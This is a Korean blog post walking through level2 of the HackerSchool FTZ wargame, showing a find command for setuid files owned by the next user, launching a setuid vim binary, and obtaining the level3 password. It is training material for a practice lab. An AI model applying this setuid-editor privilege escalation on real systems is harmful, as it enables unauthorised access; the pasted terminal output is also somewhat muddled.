티스토리 뷰
level2를 풀어보겠다.
level1을 풀어 얻은 비밀번호를 입력하여 접속하면
[level2@ftz level2]$
제일 먼저 할 것은 ls -al 명령을 이용하여 level2의 파일과 디렉토리를 확인한다.
[level2@ftz level2]$ ls -al
total 80
drwxr-xr-x 4 root level2 4096 Apr 19 2002 .
drwxr-xr-x 34 root root 4096 Sep 10 2011 ..
-rw------- 1 root root 1 Jan 15 2010 .bash_history
-rw-r--r-- 1 root root 24 Feb 24 2002 .bash_logout
-rw-r--r-- 1 root root 224 Feb 24 2002 .bash_profile
-rw-r--r-- 1 root root 151 Feb 24 2002 .bashrc
-rw-r--r-- 1 root root 400 Sep 24 2000 .cshrc
-rw-r--r-- 1 root root 4742 Sep 24 2000 .emacs
-rw-rw-r-- 1 root root 162 Mar 10 2000 .epems
-r--r--r-- 1 root root 319 Sep 24 2000 .gtkrc
-rw-r--r-- 1 root root 100 Sep 24 2000 .gvimrc
-rw-r--r-- 1 root root 60 Mar 23 2000 hint
-rw-r--r-- 1 root root 226 Sep 24 2000 .muttrc
-rw-r--r-- 1 root root 367 Sep 24 2000 .profile
drwxr-xr-x 2 root level2 4096 Feb 24 2002 public_html
drwxrwxr-x 2 root level2 4096 Jan 16 2009 tmp
-rw-r--r-- 1 root root 0 Oct 27 2002 .viminfo
-rw-r--r-- 1 root root 4145 Sep 24 2000 .vimrc
-rw-r--r-- 1 root root 245 Sep 24 2000 .Xdefaults
역시 hint 라는 파일이 존재한다.
hint 파일을 읽으면
[level2@ftz level2]$ cat hint
텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...
그럼 텍스트 파일 편집 중 쉘의 명령을 실행 시킬수 있는지 알아보아야 한다.
텍스트파일 편집은 vi 을 사용한다.
vi 는 셸상에서 새로운 파일을 편집할 때 사용되는데 3가지 모드가 있다.
- 입력모드
다른 편집기에서 타이핑을 하여 파일의 내용을 입력하는 과정
- 명령모드
다른 편집기의 편집 메뉴에서 제공하는 복사, 붙이기, 삭제 등의 편집기능
- 콜론모드
다른 편집기의 파일 메뉴에서 수행하는 멸기, 저장, 다른 이름으로 저장 등의 명령 수행
level3 권한에 setuid가 걸린 파일을 찾으면
[level2@ftz level2]$ find / -perm +6000 -user level3 2>/dev/null
/usr/bin/editor
editor 파일을 실행 시키면
[level2@ftz level2]$ /usr/bin/editor
~
~
~
~
~
~ VIM - Vi IMproved
~
~ version 6.1.320
~ by Bram Moolenaar et al.
~ Vim is open source and freely distributable
~
~ Help poor children in Uganda!
~ type :help iccf<Enter> for information
~
~ type :q<Enter> to exit
~ type :help<Enter> or <F1> for on-line help
~ type :help version6<Enter> for version info
~
~
~
~
~
vi 편집기가 실행이 된다.
[level2@ftz level2]$ /usr/bin/editor
~
~
~
~
~
~ VIM - Vi IMproved
~
~ version 6.1.320
~ by Bram Moolenaar et al.
~ Vim is open source and freely distributable
~
~ Help poor children in Uganda!
~ type :help iccf<Enter> for information
~
~ type :q<Enter> to exit
~ type :help<Enter> or <F1> for on-line help
~ type :help version6<Enter> for version info
~
~
~
~
~
my-pass명령을 이용해서 level3의 비밀번호를 얻어내는 명령을 치면
[level2@ftz level2]$ /usr/bin/editor
Level3 Password is "can you fly?".
level3의 비밀번호를 얻었다!!!!!!
'Pwnable > FTZ level' 카테고리의 다른 글
[hackerschool FTZ] level6 (0) | 2016.12.27 |
---|---|
[hackerschool FTZ] level5 (0) | 2016.12.27 |
[hackerschool FTZ] level4 (0) | 2016.12.26 |
[hackerschool FTZ] level3 (0) | 2016.11.13 |
[hackerschool FTZ] level1 (0) | 2016.11.09 |